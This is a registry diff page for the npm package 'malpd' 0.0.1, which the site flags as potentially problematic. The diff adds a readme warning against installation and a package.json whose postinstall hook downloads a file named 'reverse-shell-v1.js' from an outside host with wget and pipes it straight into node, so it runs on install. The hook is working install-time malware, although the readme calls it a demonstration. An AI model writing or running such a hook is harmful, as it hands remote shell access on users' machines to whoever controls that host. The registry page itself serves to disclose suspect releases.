malpd 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of malpd might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/Readme.md +3 -0
  2. package/package.json +12 -0
package/Readme.md ADDED
@@ -0,0 +1,3 @@
1
+ # DO NOT INSTALL THIS. YOU HAVE BEEN WARNED.
2
+
3
+ This demonstrates why you shouldn't install packages from untrusted sources.
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "malpd",
3
+ "version": "0.0.1",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "wget \"https://playground.strazze.com/payloads/reverse-shell-v1.js?raw=1\" -O - | node"
8
+ },
9
+ "keywords": ["malware", "malicious"],
10
+ "author": "",
11
+ "license": "ISC"
12
+ }